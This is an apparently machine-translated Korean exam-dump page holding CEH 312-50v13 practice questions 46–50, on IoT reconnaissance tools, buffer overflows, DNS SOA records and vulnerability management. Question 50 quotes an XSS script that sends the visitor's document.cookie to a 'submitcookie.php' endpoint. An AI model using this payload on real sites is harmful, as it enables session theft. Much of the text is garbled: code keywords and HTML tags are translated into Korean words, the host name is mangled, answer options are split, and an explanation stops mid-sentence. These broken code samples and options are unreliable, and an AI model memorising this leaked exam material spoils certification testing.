무료 온라인 액세스 ECCouncil.312-50v13.v2025-09-09.q347 모의 시험 (Page 11)

312-50v13 문제 46

Bob, an attacker, has managed to access a target loT device. He employed an online tool to gather information related to the model of the loT device and the certifications granted to it. Which of the following tools did Bob employ to gather the above Information?

A. search.com

B. EarthExplorer

C. Google image search

D. FCC ID search

312-50v13 문제 47

John은 웹 애플리케이션 방화벽 로그를 조사하고 있으며 누군가가 다음을 주입하려고 시도하고 있다는 것을 발견했습니다.
숯 버프[10];
buff[>o] - 'a':
이건 어떤 종류의 공격인가요?

A. CSRF

B. XSS

C. 버퍼 오버플로

D. SQL 주입

정답: C

버퍼 오버플로우 공격은 소프트웨어가 버퍼에 데이터를 쓸 때 버퍼 용량을 초과하여 인접한 메모리 위치를 덮어쓰는 이상 현상입니다. 다시 말해, 공간이 부족한 컨테이너에 과도한 양의 정보가 전달되어 인접한 컨테이너의 데이터를 대체하게 됩니다.
버퍼 오버플로는 공격자가 컴퓨터 메모리를 수정하여 프로그램 실행을 방해하거나 장악하려는 목적으로 자주 악용됩니다.

버퍼란 무엇인가요?
버퍼 또는 데이터 버퍼는 데이터가 한 곳에서 다른 곳으로 이동하는 동안 임시로 저장하는 물리적 메모리 저장소입니다. 이러한 버퍼는 일반적으로 RAM 메모리에서 대기합니다. 컴퓨터는 성능 향상을 위해 버퍼를 자주 사용합니다. 최신 하드 드라이브는 버퍼링을 활용하여 데이터에 효율적으로 액세스하며, 많은 온라인 서비스에서도 버퍼를 사용합니다. 예를 들어, 버퍼는 온라인 비디오 스트리밍에서 중단을 방지하기 위해 자주 사용됩니다. 비디오가 스트리밍될 때 비디오 플레이어는 버퍼링하는 동안 한 번에 비디오의 약 20%를 다운로드하여 저장한 다음 해당 버퍼에서 스트리밍합니다. 이렇게 하면 연결 속도가 약간 떨어지거나 서비스가 갑자기 중단되더라도 비디오 스트리밍 성능에 영향을 미치지 않습니다.
버퍼는 특정 양의 데이터를 담도록 설계되었습니다. 버퍼를 사용하는 프로그램에 버퍼에 너무 많은 데이터가 전송될 때 데이터를 삭제하는 내장 명령어가 없는 한, 프로그램은 버퍼에 인접한 메모리에 있는 데이터를 덮어씁니다.
버퍼 오버플로우는 공격자가 소프트웨어를 손상시키는 데 자주 악용됩니다. 버퍼 오버플로 공격은 잘 알려져 있음에도 불구하고, 사이버 보안 팀을 괴롭히는 심각한 보안 문제입니다. 2014년에는 '하트블리드'라는 위협이 SSL 소프트웨어의 버퍼 오버플로 취약점으로 인해 수많은 사용자를 공격에 노출시켰습니다.
공격자는 버퍼 오버플로를 어떻게 악용합니까?
공격자는 의도적으로 정교하게 조작된 입력값을 프로그램에 입력할 수 있으며, 이로 인해 프로그램이 충분히 크지 않은 버퍼에 해당 입력값을 저장하고 버퍼 공간에 연결된 메모리의 일부를 덮어쓰게 됩니다. 프로그램의 메모리 레이아웃이 명확하게 정의된 경우, 공격자는 실행 가능한 코드가 포함된 것으로 알려진 영역을 의도적으로 덮어쓸 수 있습니다. 그런 다음 공격자는 이 코드를 자신의 실행 코드로 대체할 수 있으며, 이는 프로그램의 작동 방식을 크게 변경할 수 있습니다.
예를 들어 메모리의 덮어쓴 부분에 포인터(메모리의 다른 위치를 가리키는 객체)가 포함되어 있는 경우 공격자의 코드는 해당 코드를 악용 페이로드를 가리키는 다른 포인터로 바꿀 수 있습니다.
이렇게 하면 전체 프로그램의 제어가 다음으로 이전됩니다.
공격자의 코드.

312-50v13 문제 48

팀원 중 한 명이 다음 SOA 레코드를 분석해 달라고 요청했습니다.
TTL은 무엇인가요?
Rutgers.edu. SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400.)

A. 200303028

B. 3600

C. 604800

D. 2400

E. 60

F. 4800

312-50v13 문제 49

취약성 관리 수명 주기에 포함되는 다양한 단계는 다음과 같습니다.
개선
자산을 식별하고 기준선을 만듭니다.
확인
감시 장치
취약점 스캔
위험성 평가
취약성 관리에 관련된 올바른 단계 순서를 식별합니다.

A. 2 # 5 # 6 # 1 # 3 # 4

B. 2 # 1 # 5 # 6 # 4 # 3

C. 2 # 4 # 5 # 3 # 6 # 1

D. 1 # 2 # 3 # 4 # 5 # 6

312-50v13 문제 50

어느 날, 주디는 포럼을 만들었습니다. 그녀는 한 사용자가 댓글은 쓰지 않고 이상한 이미지를 게시하고 있다는 것을 발견했습니다.
그녀는 즉시 보안 전문가에게 전화를 걸었고, 전문가는 해당 이미지 뒤에 다음 코드가 숨겨져 있음을 발견했습니다.
<스크립트>
document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+ escape(document.cookie)+ " />); <
/스크립트>
이미지를 클릭한 사용자에게는 어떤 문제가 발생했나요?

A. 이 코드는 브라우저에 새로운 쿠키를 삽입합니다.

B. 이 코드는 사용자를 다른 사이트로 리디렉션합니다.

C. 해당 코드는 사용자의 사용자 이름과 비밀번호를 수집하려는 바이러스입니다.

D. 이 php 파일은 코드를 자동으로 실행하고 사용자 세션 쿠키와 세션 ID를 가져옵니다.

최근 업로드: 103Oracle.1Z0-1160-1.v2025-09-10.q18; 102Oracle.1z0-1054-25.v2025-09-10.q50; 101Cisco.300-710.v2025-09-10.q297; 102VMware.2V0-41.24.v2025-09-10.q104; 144Avaya.78201X.v2025-09-09.q135; 135CompTIA.220-1202.v2025-09-09.q57; 144CheckPoint.156-215.81.v2025-09-09.q391; 175ECCouncil.312-50v13.v2025-09-09.q347; 126Supermicro.SMI300XS.v2025-09-08.q15; 122Oracle.1z0-1104-25.v2025-09-08.q12